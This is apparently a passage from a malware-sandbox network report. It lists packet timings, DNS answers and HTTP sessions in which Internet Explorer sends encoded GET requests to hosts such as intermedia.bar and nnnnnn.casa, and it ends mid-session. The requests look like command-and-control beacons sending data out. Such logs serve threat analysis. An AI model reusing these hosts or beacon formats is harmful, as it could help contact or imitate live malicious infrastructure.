                  Jan 21, 2022 07:53:53.641319036 CET4985980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.643374920 CET4985980192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.644434929 CET4986280192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.645347118 CET4986380192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.705151081 CET804986231.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.705251932 CET4986280192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.706053019 CET4986280192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.706614017 CET804985931.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.708606005 CET804986331.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.708703041 CET4986380192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.766371012 CET804986231.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.766408920 CET804986231.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:53.766474962 CET4986280192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.766741991 CET4986280192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:53.827630997 CET804986231.41.46.120192.168.2.3
                  Jan 21, 2022 07:53:57.430672884 CET4984680192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:58.764377117 CET4985280192.168.2.331.41.46.120
                  Jan 21, 2022 07:53:59.644212008 CET4986080192.168.2.331.41.46.120
                  Jan 21, 2022 07:54:00.318569899 CET4986380192.168.2.331.41.46.120
                  Jan 21, 2022 07:54:16.202807903 CET4986480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:16.214653015 CET4986580192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:16.362698078 CET8049864162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:16.362823963 CET4986480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:16.363537073 CET4986480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:16.374663115 CET8049865162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:16.374919891 CET4986580192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:16.797559977 CET4986480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:16.959012985 CET8049864162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:18.937757015 CET8049864162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:18.944869041 CET4986480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:19.786675930 CET4986680192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:19.787460089 CET4986780192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:19.946477890 CET8049866198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:19.947033882 CET8049867198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:19.954096079 CET4986780192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:19.954148054 CET4986680192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.027968884 CET4986680192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.187815905 CET8049866198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.187839985 CET8049866198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.208184958 CET4986780192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.367965937 CET8049867198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.367994070 CET8049867198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.369580030 CET4986880192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.370368958 CET4986980192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.529508114 CET8049868198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.529607058 CET4986880192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.530050993 CET8049869198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.530349016 CET4986880192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.530493021 CET4986980192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.689964056 CET8049868198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.689994097 CET8049868198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.702385902 CET4986980192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.862216949 CET8049869198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.862255096 CET8049869198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:20.874614954 CET4987080192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:20.875433922 CET4987180192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.034329891 CET8049870198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.034439087 CET4987080192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.035294056 CET8049871198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.035410881 CET4987080192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.035536051 CET4987180192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.195035934 CET8049870198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.195082903 CET8049870198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.206569910 CET4987180192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.366374016 CET8049871198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.366410017 CET8049871198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.386260986 CET4987280192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.386295080 CET4987380192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.387722969 CET4987480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.387758017 CET4987580192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.414412975 CET4987780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.414412022 CET4987680192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.429308891 CET4987880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.429316044 CET4987980192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.546133995 CET8049873198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.546185017 CET8049872198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.546320915 CET4987380192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.546413898 CET4987280192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.547394037 CET8049874162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:21.547491074 CET8049875162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:21.547805071 CET4987280192.168.2.3198.54.117.216
                  Jan 21, 2022 07:54:21.548062086 CET4987480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.548086882 CET4987580192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.549371004 CET4987480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.574450016 CET8049877162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:21.574501991 CET8049876162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:21.574609041 CET4987780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.574700117 CET4987680192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.575253963 CET4987780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.589869976 CET8049879162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:21.589934111 CET8049878162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:21.589978933 CET4987980192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.590420008 CET4987980192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.590523005 CET4987880192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.707670927 CET8049872198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.707706928 CET8049872198.54.117.216192.168.2.3
                  Jan 21, 2022 07:54:21.750154018 CET8049879162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:21.944432020 CET8049864162.255.119.177192.168.2.3
                  Jan 21, 2022 07:54:21.947930098 CET4986480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:21.983202934 CET4987480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:22.014446020 CET4987780192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:22.516026974 CET4987480192.168.2.3162.255.119.177
                  Jan 21, 2022 07:54:22.531586885 CET4987780192.168.2.3162.255.119.177
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:24.313271046 CET8.8.8.8192.168.2.30xb57fNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:43.993266106 CET8.8.8.8192.168.2.30x9f6bNo error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.093403101 CET8.8.8.8192.168.2.30xcaacNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:47.464580059 CET8.8.8.8192.168.2.30x37e1No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:54:49.862381935 CET8.8.8.8192.168.2.30xf154No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:07.519746065 CET8.8.8.8192.168.2.30xe76cNo error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:10.306759119 CET8.8.8.8192.168.2.30x35b1No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:18.808697939 CET8.8.8.8192.168.2.30xe7d2No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.131164074 CET8.8.8.8192.168.2.30x5cd7No error (0)nnnnnn.casa192.64.119.233A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.172622919 CET8.8.8.8192.168.2.30xa9cdNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)www.nnnnnn.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:19.491530895 CET8.8.8.8192.168.2.30x7631No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:27.767707109 CET8.8.8.8192.168.2.30xa700No error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:30.529737949 CET8.8.8.8192.168.2.30x1ddaNo error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:39.584458113 CET8.8.8.8192.168.2.30xc787No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:39.996416092 CET8.8.8.8192.168.2.30x5086No error (0)intermedia.bar31.41.46.120A (IP address)IN (0x0001)
                  Jan 21, 2022 07:55:59.791659117 CET8.8.8.8192.168.2.30xd45dNo error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  Jan 21, 2022 07:56:00.223572969 CET8.8.8.8192.168.2.30xa3b2No error (0)nnnnnn.bar162.255.119.177A (IP address)IN (0x0001)
                  • intermedia.bar
                  • nnnnnn.casa
                  • www.nnnnnn.casa
                  • nnnnnn.bar
                  • www.nnnnnn.bar
                  Session ID: 0 | Source IP: 192.168.2.3 | Source Port: 49744 | Destination IP: 31.41.46.120 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:52:31.631772995 CET | kBytes transferred: 1133 | Direction: OUT | Data:
                  GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID: 1 | Source IP: 192.168.2.3 | Source Port: 49745 | Destination IP: 31.41.46.120 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:52:31.707668066 CET | kBytes transferred: 1134 | Direction: OUT | Data:
                  GET /drew/AHuA6TotyEkgE/zVHP4orW/8ZyPY4kye4oTIP7K7spF8Z9/AzQVZQntBp/tPbfiBhZz1jY6V1X4/X3paMFGt7Rtb/Gt0dLluCvH5/isi1V1iV9bVleO/ZSGFxB9026a2AgTqikOVK/u0I_2FkyTPhzae4E/1G0e1neGkHRRAKR/dF6sfHEo8IqgOHnhhJ/mLAA5W_2B/LYdzOxqVD56rhjE9w2zj/4EWbKl1xgm4daCyR1mC/ReRKxfnNjlWG/r.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID: 10 | Source IP: 192.168.2.3 | Source Port: 49754 | Destination IP: 31.41.46.120 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:52:33.224863052 CET | kBytes transferred: 1144 | Direction: OUT | Data:
                  GET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID: 11 | Source IP: 192.168.2.3 | Source Port: 49759 | Destination IP: 31.41.46.120 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:52:33.373172998 CET | kBytes transferred: 1146 | Direction: OUT | Data:
                  GET /drew/XRuGSIvrh83QGTYBTk/D9D3Vm19e/d5qtxwnIReenmX0dL_2F/z8AEjIs12VaPeEM7Fev/sHz_2Bx6bKLjtUULCEG0oV/GFai8cinvXLi4/iJJ7udwg/w0syzQHw_2FkzljAekHpIIx/DRVmfhCAjc/ZkwIrTh7UfbfcJWEg/EIPSCrhxM6nj/j9uYJZXC8_2/F6Btih0QBETHvA/LKTtsUnIUQHLFxaNR0li7/dM04PASCBbiQz0aa/qK64_2Bg_2B/VwE.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: intermedia.bar
                  Connection: Keep-Alive


                  Session ID: 12 | Source IP: 192.168.2.3 | Source Port: 49798 | Destination IP: 192.64.119.233 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:19.287817955 CET | kBytes transferred: 1869 | Direction: OUT | Data:
                  GET /drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Timestamp: Jan 21, 2022 07:53:22.050024986 CET | kBytes transferred: 1894 | Direction: IN | Data:
                  HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:53:21 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 324
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk'>Found</a>.


                  Session ID: 13 | Source IP: 192.168.2.3 | Source Port: 49801 | Destination IP: 192.64.119.233 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:20.714209080 CET | kBytes transferred: 1870 | Direction: OUT | Data:
                  GET /drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Timestamp: Jan 21, 2022 07:53:23.919502974 CET | kBytes transferred: 10767 | Direction: IN | Data:
                  HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:53:23 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 322
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk'>Found</a>.


                  Session ID: 14 | Source IP: 192.168.2.3 | Source Port: 49802 | Destination IP: 192.64.119.233 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp: Jan 21, 2022 07:53:20.722321987 CET | kBytes transferred: 1871 | Direction: OUT | Data:
                  GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: nnnnnn.casa
                  Connection: Keep-Alive
                  Timestamp: Jan 21, 2022 07:53:22.071861982 CET | kBytes transferred: 1895 | Direction: IN | Data:
                  HTTP/1.1 302 Found
                  Server: nginx
                  Date: Fri, 21 Jan 2022 06:53:21 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 329
                  Connection: keep-alive
                  Location: http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk
                  X-Served-By: Namecheap URL Forward
                  Data Ascii: <a href='http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk'>Found</a>.


                  Session ID: 15 | Source IP: 192.168.2.3 | Source Port: 49804 | Destination IP: 192.64.119.233 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
